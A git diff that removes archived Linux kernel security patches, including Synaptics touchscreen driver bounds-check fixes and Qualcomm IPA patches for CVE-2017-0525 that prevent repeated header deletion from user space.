-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c
-index e699dfea50c81..6878b71da9be0 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c
-@@ -565,18 +565,24 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- return -EBADF;
- }
-
-- if (count == 0)
-- return 0;
-+ mutex_lock(&(dev_data->file_mutex));
-+
-+ if (*f_pos > REG_ADDR_LIMIT) {
-+ retval = -EFAULT;
-+ goto clean_up;
-+ }
-
- if (count > (REG_ADDR_LIMIT - *f_pos))
- count = REG_ADDR_LIMIT - *f_pos;
-
-+ if (count == 0) {
-+ retval = 0;
-+ goto clean_up;
-+ }
- address = (unsigned short)(*f_pos);
-
- rmidev_allocate_buffer(count);
-
-- mutex_lock(&(dev_data->file_mutex));
--
- retval = synaptics_rmi4_reg_read(rmidev->rmi4_data,
- *f_pos,
- rmidev->tmpbuf,
-@@ -636,19 +642,25 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- return -EBADF;
- }
-
-- if (count == 0)
-- return 0;
-+ mutex_lock(&(dev_data->file_mutex));
-
-+ if (*f_pos > REG_ADDR_LIMIT) {
-+ retval = -EFAULT;
-+ goto unlock;
-+ }
- if (count > (REG_ADDR_LIMIT - *f_pos))
- count = REG_ADDR_LIMIT - *f_pos;
-+ if (count == 0) {
-+ retval = 0;
-+ goto unlock;
-+ }
-
- rmidev_allocate_buffer(count);
-
-- if (copy_from_user(rmidev->tmpbuf, buf, count))
-- return -EFAULT;
--
--
mutex_lock(&(dev_data->file_mutex));
--
-+ if (copy_from_user(rmidev->tmpbuf, buf, count)) {
-+ retval = -EFAULT;
-+ goto unlock;
-+ }
- retval = synaptics_rmi4_reg_write(rmidev->rmi4_data,
- *f_pos,
- rmidev->tmpbuf,
-@@ -656,8 +668,8 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- if (retval >= 0)
- *f_pos += retval;
-
-+unlock:
- mutex_unlock(&(dev_data->file_mutex));
--
- return retval;
- }
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0525/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0525/3.10/0001.patch
deleted file mode 100644
index e259c4d6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0525/3.10/0001.patch
+++ /dev/null
@@ -1,323 +0,0 @@
-From 58a0d46820909166c89286bdbffbae3358daf778 Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi
-Date: Mon, 16 Jan 2017 00:17:04 +0200
-Subject: msm: ipa: Prevent multiple header deletion from user space
-
-An IPA header or processing context can be added once
-and later deleted once from user space.
-Multiple deletion may cause invalid state of the headers
-software cache.
-
-Change-Id: Ic0b8472b7fd8a76233a007d90c832af726184574
-CRs-fixed: 1097714
-Signed-off-by: Ghanim Fodi
----
- drivers/platform/msm/ipa/ipa.c | 13 ++++---
- drivers/platform/msm/ipa/ipa_hdr.c | 77 +++++++++++++++++++++++++++++++-------
- drivers/platform/msm/ipa/ipa_i.h | 11 +++++-
- 3 files changed, 79 insertions(+), 22 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa.c b/drivers/platform/msm/ipa/ipa.c
-index ddb716c..82caefc 100644
---- a/drivers/platform/msm/ipa/ipa.c
-+++ b/drivers/platform/msm/ipa/ipa.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -436,7 +436,8 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- retval = -EFAULT;
- break;
- }
-- if (ipa_del_hdr((struct ipa_ioc_del_hdr *)param)) {
-+ if (ipa_del_hdr_by_user((struct ipa_ioc_del_hdr *)param,
-+ true)) {
- retval = -EFAULT;
- break;
- }
-@@ -1117,8 +1118,8 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- retval = -EFAULT;
- break;
- }
-- if (ipa_del_hdr_proc_ctx(
-- (struct ipa_ioc_del_hdr_proc_ctx *)param)) {
-+ if (ipa_del_hdr_proc_ctx_by_user(
-+ (struct ipa_ioc_del_hdr_proc_ctx *)param, true)) {
- retval = -EFAULT;
- break;
- }
-@@ -2256,7 +2257,7 @@ fail_schedule_delayed_work:
- if (ipa_ctx->dflt_v4_rt_rule_hdl)
- __ipa_del_rt_rule(ipa_ctx->dflt_v4_rt_rule_hdl);
- if (ipa_ctx->excp_hdr_hdl)
-- __ipa_del_hdr(ipa_ctx->excp_hdr_hdl);
-+ __ipa_del_hdr(ipa_ctx->excp_hdr_hdl, false);
- ipa_teardown_sys_pipe(ipa_ctx->clnt_hdl_cmd);
- fail_cmd:
- return result;
-@@ -2268,7 +2269,7 @@ static void ipa_teardown_apps_pipes(void)
- ipa_teardown_sys_pipe(ipa_ctx->clnt_hdl_data_in);
- __ipa_del_rt_rule(ipa_ctx->dflt_v6_rt_rule_hdl);
- __ipa_del_rt_rule(ipa_ctx->dflt_v4_rt_rule_hdl);
-- __ipa_del_hdr(ipa_ctx->excp_hdr_hdl);
-+ __ipa_del_hdr(ipa_ctx->excp_hdr_hdl, false);
- ipa_teardown_sys_pipe(ipa_ctx->clnt_hdl_cmd);
- }
-
-diff --git a/drivers/platform/msm/ipa/ipa_hdr.c b/drivers/platform/msm/ipa/ipa_hdr.c
-index 67aa787..45b0ef6 100644
---- a/drivers/platform/msm/ipa/ipa_hdr.c
-+++ b/drivers/platform/msm/ipa/ipa_hdr.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -719,7 +719,8 @@ error:
- return -EPERM;
- }
-
--static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
-+static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl,
-+ bool release_hdr, bool by_user)
- {
- struct ipa_hdr_proc_ctx_entry *entry;
- struct ipa_hdr_proc_ctx_tbl *htbl = &ipa_ctx->hdr_proc_ctx_tbl;
-@@ -733,6 +734,14 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- IPADBG("del ctx proc cnt=%d ofst=%d\n",
- htbl->proc_ctx_cnt, entry->offset_entry->offset);
-
-+ if (by_user && entry->user_deleted) {
-+ IPAERR("proc_ctx already deleted by user\n");
-+ return -EINVAL;
-+ }
-+
-+ if (by_user)
-+ entry->user_deleted = true;
-+
- if (--entry->ref_cnt) {
- IPADBG("proc_ctx_hdl %x ref_cnt %d\n",
- proc_ctx_hdl, entry->ref_cnt);
-@@ -740,7 +749,7 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- }
-
- if (release_hdr)
-- __ipa_release_hdr(entry->hdr->id);
-+ __ipa_del_hdr(entry->hdr->id, false);
-
- /* move the offset entry to appropriate free list */
- list_move(&entry->offset_entry->link,
-@@ -757,7 +766,7 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- }
-
-
--int __ipa_del_hdr(u32 hdr_hdl)
-+int __ipa_del_hdr(u32 hdr_hdl, bool by_user)
- {
- struct ipa_hdr_entry *entry;
- struct ipa_hdr_tbl *htbl = &ipa_ctx->hdr_tbl;
-@@ -776,6 +785,14 @@ int __ipa_del_hdr(u32 hdr_hdl)
- IPADBG("del hdr of sz=%d hdr_cnt=%d ofst=%d\n", entry->hdr_len,
- htbl->hdr_cnt, entry->offset_entry->offset);
-
-+ if (by_user && entry->user_deleted) {
-+ IPAERR("hdr already deleted by user\n");
-+ return -EINVAL;
-+ }
-+
-+ if (by_user)
-+ entry->user_deleted = true;
-+
- if (--entry->ref_cnt) {
- IPADBG("hdr_hdl %x ref_cnt %d\n", hdr_hdl, entry->ref_cnt);
- return 0;
-@@ -786,7 +803,7 @@ int __ipa_del_hdr(u32 hdr_hdl)
- entry->phys_base,
- entry->hdr_len,
- DMA_TO_DEVICE);
-- __ipa_del_hdr_proc_ctx(entry->proc_ctx->id, false);
-+ __ipa_del_hdr_proc_ctx(entry->proc_ctx->id, false, false);
- } else {
- /* move the offset entry to appropriate free list */
- list_move(&entry->offset_entry->link,
-@@ -849,15 +866,16 @@ bail:
- EXPORT_SYMBOL(ipa_add_hdr);
-
- /**
-- * ipa_del_hdr() - Remove the specified headers from SW and optionally commit them
-- * to IPA HW
-+ * ipa_del_hdr_by_user() - Remove the specified headers
-+ * from SW and optionally commit them to IPA HW
- * @hdls: [inout] set of headers to delete
-+ * @by_user: Operation requested by user?
- *
- * Returns: 0 on success, negative on failure
- *
- * Note: Should not be called from atomic context
- */
--int ipa_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+int ipa_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user)
- {
- int i;
- int result = -EFAULT;
-@@ -869,7 +887,7 @@ int ipa_del_hdr(struct ipa_ioc_del_hdr *hdls)
-
- mutex_lock(&ipa_ctx->lock);
- for (i = 0; i < hdls->num_hdls; i++) {
-- if (__ipa_del_hdr(hdls->hdl[i].hdl)) {
-+ if (__ipa_del_hdr(hdls->hdl[i].hdl, by_user)) {
- IPAERR("failed to del hdr %i\n", i);
- hdls->hdl[i].status = -1;
- } else {
-@@ -888,6 +906,20 @@ bail:
- mutex_unlock(&ipa_ctx->lock);
- return result;
- }
-+
-+/**
-+ * ipa_del_hdr() - Remove the specified headers from SW and optionally commit them
-+ * to IPA HW
-+ * @hdls: [inout] set of headers to delete
-+ *
-+ * Returns: 0 on success, negative on failure
-+ *
-+ * Note: Should not be called from atomic context
-+ */
-+int ipa_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+{
-+ return ipa_del_hdr_by_user(hdls, false);
-+}
- EXPORT_SYMBOL(ipa_del_hdr);
-
- /**
-@@ -936,16 +968,18 @@ bail:
- EXPORT_SYMBOL(ipa_add_hdr_proc_ctx);
-
- /**
-- * ipa_del_hdr_proc_ctx() -
-+ * ipa_del_hdr_proc_ctx_by_user() -
- * Remove the specified processing context headers from SW and
- * optionally commit them to IPA HW.
- * @hdls: [inout] set of processing context headers to delete
-+ * @by_user: Operation requested by user?
- *
- * Returns: 0 on success, negative on failure
- *
- * Note: Should not be called from atomic context
- */
--int ipa_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+int ipa_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+ bool by_user)
- {
- int i;
- int result;
-@@ -957,7 +991,7 @@ int ipa_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-
- mutex_lock(&ipa_ctx->lock);
- for (i = 0; i < hdls->num_hdls; i++) {
-- if (__ipa_del_hdr_proc_ctx(hdls->hdl[i].hdl, true)) {
-+ if (__ipa_del_hdr_proc_ctx(hdls->hdl[i].hdl, true, by_user)) {
- IPAERR("failed to del hdr %i\n", i);
- hdls->hdl[i].status = -1;
- } else {
-@@ -976,6 +1010,21 @@ bail:
- mutex_unlock(&ipa_ctx->lock);
- return result;
- }
-+
-+/**
-+ * ipa_del_hdr_proc_ctx() -
-+ * Remove the specified processing context headers from SW and
-+ * optionally commit them to IPA HW.
-+ * @hdls: [inout] set of processing context headers to delete
-+ *
-+ * Returns: 0 on success, negative on failure
-+ *
-+ * Note: Should not be called from atomic context
-+ */
-+int ipa_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+{
-+ return ipa_del_hdr_proc_ctx_by_user(hdls, false);
-+}
- EXPORT_SYMBOL(ipa_del_hdr_proc_ctx);
-
- /**
-@@ -1197,7 +1246,7 @@ int __ipa_release_hdr(u32 hdr_hdl)
- {
- int result = 0;
-
-- if (__ipa_del_hdr(hdr_hdl)) {
-+ if (__ipa_del_hdr(hdr_hdl, false)) {
- IPADBG("fail to del hdr %x\n", hdr_hdl);
- result = -EFAULT;
- goto bail;
-@@ -1225,7 +1274,7 @@ int __ipa_release_hdr_proc_ctx(u32 proc_ctx_hdl)
- {
- int result = 0;
-
-- if (__ipa_del_hdr_proc_ctx(proc_ctx_hdl, true)) {
-+ if (__ipa_del_hdr_proc_ctx(proc_ctx_hdl, true, false)) {
- IPADBG("fail to del hdr %x\n", proc_ctx_hdl);
- result = -EFAULT;
- goto bail;
-diff --git a/drivers/platform/msm/ipa/ipa_i.h b/drivers/platform/msm/ipa/ipa_i.h
-index ed05434..c71862c 100644
----
a/drivers/platform/msm/ipa/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_i.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -224,6 +224,7 @@ struct ipa_rt_tbl {
- * @id: header entry id
- * @is_eth2_ofst_valid: is eth2_ofst field valid?
- * @eth2_ofst: offset to start of Ethernet-II/802.3 header
-+ * @user_deleted: is the header deleted by the user?
- */
- struct ipa_hdr_entry {
- struct list_head link;
-@@ -241,6 +242,7 @@ struct ipa_hdr_entry {
- int id;
- u8 is_eth2_ofst_valid;
- u16 eth2_ofst;
-+ bool user_deleted;
- };
-
- /**
-@@ -316,6 +318,7 @@ struct ipa_hdr_proc_ctx_add_hdr_cmd_seq {
- * @cookie: cookie used for validity check
- * @ref_cnt: reference counter of routing table
- * @id: processing context header entry id
-+ * @user_deleted: is the hdr processing context deleted by the user?
- */
- struct ipa_hdr_proc_ctx_entry {
- struct list_head link;
-@@ -325,6 +328,7 @@ struct ipa_hdr_proc_ctx_entry {
- u32 cookie;
- u32 ref_cnt;
- int id;
-+ bool user_deleted;
- };
-
- /**
-@@ -1136,8 +1140,11 @@ void ipa_inc_client_enable_clks(void);
- int ipa_inc_client_enable_clks_no_block(void);
- void ipa_dec_client_disable_clks(void);
- int ipa_interrupts_init(u32 ipa_irq, u32 ee, struct device *ipa_dev);
-+int ipa_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user);
-+int ipa_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+ bool by_user);
- int __ipa_del_rt_rule(u32 rule_hdl);
--int __ipa_del_hdr(u32 hdr_hdl);
-+int __ipa_del_hdr(u32 hdr_hdl, bool by_user);
- int __ipa_release_hdr(u32 hdr_hdl);
- int __ipa_release_hdr_proc_ctx(u32 proc_ctx_hdl);
- int _ipa_read_gen_reg_v1_0(char *buff, int max_len);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0525/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-0525/3.18/0002.patch
deleted file mode 100644
index 54ca163d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0525/3.18/0002.patch
+++ /dev/null
@@ -1,663 +0,0 @@
-From a6a6e4993aca80b7cddab8752f7d8636eb45a8c5 Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi
-Date: Thu, 12 Jan 2017 15:14:15 +0200
-Subject: msm: ipa: Prevent multiple header deletion from user space
-
-An IPA header or processing context can be added once
-and later deleted once from user space.
-Multiple deletion may cause invalid state of the headers
-software cache.
-
-Change-Id: Ic0b8472b7fd8a76233a007d90c832af726184574
-CRs-fixed: 1097714
-Signed-off-by: Ghanim Fodi
----
- drivers/platform/msm/ipa/ipa_v2/ipa.c | 13 ++---
- drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c | 79 +++++++++++++++++++++++++------
- drivers/platform/msm/ipa/ipa_v2/ipa_i.h | 13 ++++-
- drivers/platform/msm/ipa/ipa_v3/ipa.c | 11 +++--
- drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c | 79 +++++++++++++++++++++++++------
- drivers/platform/msm/ipa/ipa_v3/ipa_i.h | 11 ++++-
- 6 files changed, 162 insertions(+), 44 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa.c b/drivers/platform/msm/ipa/ipa_v2/ipa.c
-index 7bcb267..d6f2ce6 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -734,7 +734,8 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- retval = -EINVAL;
- break;
- }
-- if (ipa2_del_hdr((struct ipa_ioc_del_hdr *)param)) {
-+ if (ipa2_del_hdr_by_user((struct ipa_ioc_del_hdr *)param,
-+ true)) {
- retval = -EFAULT;
- break;
- }
-@@ -1418,8 +1419,8 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- retval = -EINVAL;
- break;
- }
-- if (ipa2_del_hdr_proc_ctx(
-- (struct ipa_ioc_del_hdr_proc_ctx *)param)) {
-+ if (ipa2_del_hdr_proc_ctx_by_user(
-+ (struct ipa_ioc_del_hdr_proc_ctx *)param, true)) {
- retval = -EFAULT;
- break;
- }
-@@ -2801,7 +2802,7 @@ fail_schedule_delayed_work:
- if (ipa_ctx->dflt_v4_rt_rule_hdl)
- __ipa_del_rt_rule(ipa_ctx->dflt_v4_rt_rule_hdl);
- if (ipa_ctx->excp_hdr_hdl)
-- __ipa_del_hdr(ipa_ctx->excp_hdr_hdl);
-+ __ipa_del_hdr(ipa_ctx->excp_hdr_hdl, false);
- ipa2_teardown_sys_pipe(ipa_ctx->clnt_hdl_cmd);
- fail_cmd:
- return result;
-@@ -2813,7 +2814,7 @@ static void ipa_teardown_apps_pipes(void)
- ipa2_teardown_sys_pipe(ipa_ctx->clnt_hdl_data_in);
- __ipa_del_rt_rule(ipa_ctx->dflt_v6_rt_rule_hdl);
- __ipa_del_rt_rule(ipa_ctx->dflt_v4_rt_rule_hdl);
-- __ipa_del_hdr(ipa_ctx->excp_hdr_hdl);
-+ __ipa_del_hdr(ipa_ctx->excp_hdr_hdl, false);
- ipa2_teardown_sys_pipe(ipa_ctx->clnt_hdl_cmd);
- }
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c b/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c
-index ee4ddbb..6a66b0b 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -805,7 +805,8 @@ error:
- return -EPERM;
- }
-
--static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
-+static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl,
-+ bool release_hdr, bool by_user)
- {
- struct ipa_hdr_proc_ctx_entry *entry;
- struct ipa_hdr_proc_ctx_tbl *htbl = &ipa_ctx->hdr_proc_ctx_tbl;
-@@ -819,6 +820,14 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- IPADBG("del ctx proc cnt=%d ofst=%d\n",
- htbl->proc_ctx_cnt, entry->offset_entry->offset);
-
-+ if (by_user && entry->user_deleted) {
-+ IPAERR("proc_ctx already deleted by user\n");
-+ return -EINVAL;
-+ }
-+
-+ if (by_user)
-+ entry->user_deleted = true;
-+
- if (--entry->ref_cnt) {
- IPADBG("proc_ctx_hdl %x ref_cnt %d\n",
- proc_ctx_hdl, entry->ref_cnt);
-@@ -826,7 +835,7 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- }
-
- if (release_hdr)
-- __ipa_del_hdr(entry->hdr->id);
-+ __ipa_del_hdr(entry->hdr->id, false);
-
- /* move the offset entry to appropriate free list */
- list_move(&entry->offset_entry->link,
-@@ -843,7 +852,7 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- }
-
-
--int __ipa_del_hdr(u32 hdr_hdl)
-+int __ipa_del_hdr(u32 hdr_hdl, bool by_user)
- {
- struct ipa_hdr_entry *entry;
- struct ipa_hdr_tbl *htbl = &ipa_ctx->hdr_tbl;
-@@ -854,7 +863,7 @@ int __ipa_del_hdr(u32 hdr_hdl)
- return -EINVAL;
- }
-
-- if (!entry || (entry->cookie != IPA_COOKIE)) {
-+ if (entry->cookie != IPA_COOKIE) {
- IPAERR("bad parm\n");
- return -EINVAL;
- }
-@@ -866,6 +875,14 @@ int __ipa_del_hdr(u32 hdr_hdl)
- IPADBG("del hdr of sz=%d hdr_cnt=%d ofst=%d\n", entry->hdr_len,
- htbl->hdr_cnt, entry->offset_entry->offset);
-
-+ if (by_user && entry->user_deleted) {
-+ IPAERR("hdr already deleted by user\n");
-+ return -EINVAL;
-+ }
-+
-+ if (by_user)
-+
entry->user_deleted = true;
-+
- if (--entry->ref_cnt) {
- IPADBG("hdr_hdl %x ref_cnt %d\n", hdr_hdl, entry->ref_cnt);
- return 0;
-@@ -876,7 +893,7 @@ int __ipa_del_hdr(u32 hdr_hdl)
- entry->phys_base,
- entry->hdr_len,
- DMA_TO_DEVICE);
-- __ipa_del_hdr_proc_ctx(entry->proc_ctx->id, false);
-+ __ipa_del_hdr_proc_ctx(entry->proc_ctx->id, false, false);
- } else {
- /* move the offset entry to appropriate free list */
- list_move(&entry->offset_entry->link,
-@@ -943,15 +960,16 @@ bail:
- }
-
- /**
-- * ipa2_del_hdr() - Remove the specified headers from SW and optionally commit them
-- * to IPA HW
-+ * ipa2_del_hdr_by_user() - Remove the specified headers
-+ * from SW and optionally commit them to IPA HW
- * @hdls: [inout] set of headers to delete
-+ * @by_user: Operation requested by user?
- *
- * Returns: 0 on success, negative on failure
- *
- * Note: Should not be called from atomic context
- */
--int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+int ipa2_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user)
- {
- int i;
- int result = -EFAULT;
-@@ -968,7 +986,7 @@ int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls)
-
- mutex_lock(&ipa_ctx->lock);
- for (i = 0; i < hdls->num_hdls; i++) {
-- if (__ipa_del_hdr(hdls->hdl[i].hdl)) {
-+ if (__ipa_del_hdr(hdls->hdl[i].hdl, by_user)) {
- IPAERR("failed to del hdr %i\n", i);
- hdls->hdl[i].status = -1;
- } else {
-@@ -989,6 +1007,20 @@ bail:
- }
-
- /**
-+ * ipa2_del_hdr() - Remove the specified headers from SW and optionally commit them
-+ * to IPA HW
-+ * @hdls: [inout] set of headers to delete
-+ *
-+ * Returns: 0 on success, negative on failure
-+ *
-+ * Note: Should not be called from atomic context
-+ */
-+int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+{
-+ return ipa2_del_hdr_by_user(hdls, false);
-+}
-+
-+/**
- * ipa2_add_hdr_proc_ctx() - add the specified headers to SW
- * and optionally commit them to IPA HW
- * @proc_ctxs: [inout] set of processing context headers to add
-@@ -1040,16 +1072,18 @@ bail:
- }
-
- /**
-- * ipa2_del_hdr_proc_ctx() -
-+ * ipa2_del_hdr_proc_ctx_by_user() -
- * Remove the specified processing context headers from SW and
- * optionally commit them to IPA HW.
- * @hdls: [inout] set of processing context headers to delete
-+ * @by_user: Operation requested by user?
- *
- * Returns: 0 on success, negative on failure
- *
- * Note: Should not be called from atomic context
- */
--int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+int ipa2_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+ bool by_user)
- {
- int i;
- int result;
-@@ -1068,7 +1102,7 @@ int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-
- mutex_lock(&ipa_ctx->lock);
- for (i = 0; i < hdls->num_hdls; i++) {
-- if (__ipa_del_hdr_proc_ctx(hdls->hdl[i].hdl, true)) {
-+ if (__ipa_del_hdr_proc_ctx(hdls->hdl[i].hdl, true, by_user)) {
- IPAERR("failed to del hdr %i\n", i);
- hdls->hdl[i].status = -1;
- } else {
-@@ -1089,6 +1123,21 @@ bail:
- }
-
- /**
-+ * ipa2_del_hdr_proc_ctx() -
-+ * Remove the specified processing context headers from SW and
-+ * optionally commit them to IPA HW.
-+ * @hdls: [inout] set of processing context headers to delete -+ * -+ * Returns: 0 on success, negative on failure -+ * -+ * Note: Should not be called from atomic context -+ */ -+int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls) -+{ -+ return ipa2_del_hdr_proc_ctx_by_user(hdls, false); -+} -+ -+/** - * ipa2_commit_hdr() - commit to IPA HW the current header table in SW - * - * Returns: 0 on success, negative on failure -@@ -1316,7 +1365,7 @@ int __ipa_release_hdr(u32 hdr_hdl) - { - int result = 0; - -- if (__ipa_del_hdr(hdr_hdl)) { -+ if (__ipa_del_hdr(hdr_hdl, false)) { - IPADBG("fail to del hdr %x\n", hdr_hdl); - result = -EFAULT; - goto bail; -@@ -1344,7 +1393,7 @@ int __ipa_release_hdr_proc_ctx(u32 proc_ctx_hdl) - { - int result = 0; - -- if (__ipa_del_hdr_proc_ctx(proc_ctx_hdl, true)) { -+ if (__ipa_del_hdr_proc_ctx(proc_ctx_hdl, true, false)) { - IPADBG("fail to del hdr %x\n", proc_ctx_hdl); - result = -EFAULT; - goto bail; -diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h -index 67d8c94..9094f19 100644 ---- a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h -+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -254,6 +254,7 @@ struct ipa_rt_tbl { - * @id: header entry id - * @is_eth2_ofst_valid: is eth2_ofst field valid? - * @eth2_ofst: offset to start of Ethernet-II/802.3 header -+ * @user_deleted: is the header deleted by the user? 
- */ - struct ipa_hdr_entry { - struct list_head link; -@@ -271,6 +272,7 @@ struct ipa_hdr_entry { - int id; - u8 is_eth2_ofst_valid; - u16 eth2_ofst; -+ bool user_deleted; - }; - - /** -@@ -334,6 +336,7 @@ struct ipa_hdr_proc_ctx_add_hdr_cmd_seq { - * @cookie: cookie used for validity check - * @ref_cnt: reference counter of routing table - * @id: processing context header entry id -+ * @user_deleted: is the hdr processing context deleted by the user? - */ - struct ipa_hdr_proc_ctx_entry { - struct list_head link; -@@ -343,6 +346,7 @@ struct ipa_hdr_proc_ctx_entry { - u32 cookie; - u32 ref_cnt; - int id; -+ bool user_deleted; - }; - - /** -@@ -1361,6 +1365,8 @@ int ipa2_add_hdr(struct ipa_ioc_add_hdr *hdrs); - - int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls); - -+int ipa2_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user); -+ - int ipa2_commit_hdr(void); - - int ipa2_reset_hdr(void); -@@ -1378,6 +1384,9 @@ int ipa2_add_hdr_proc_ctx(struct ipa_ioc_add_hdr_proc_ctx *proc_ctxs); - - int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls); - -+int ipa2_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls, -+ bool by_user); -+ - /* - * Routing - */ -@@ -1669,7 +1678,7 @@ int ipa2_active_clients_log_print_table(char *buf, int size); - void ipa2_active_clients_log_clear(void); - int ipa_interrupts_init(u32 ipa_irq, u32 ee, struct device *ipa_dev); - int __ipa_del_rt_rule(u32 rule_hdl); --int __ipa_del_hdr(u32 hdr_hdl); -+int __ipa_del_hdr(u32 hdr_hdl, bool by_user); - int __ipa_release_hdr(u32 hdr_hdl); - int __ipa_release_hdr_proc_ctx(u32 proc_ctx_hdl); - int _ipa_read_gen_reg_v1_1(char *buff, int max_len); -diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa.c b/drivers/platform/msm/ipa/ipa_v3/ipa.c -index e87c4e2..aa83cbd 100644 ---- a/drivers/platform/msm/ipa/ipa_v3/ipa.c -+++ b/drivers/platform/msm/ipa/ipa_v3/ipa.c -@@ -784,7 +784,8 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EINVAL; - break; 
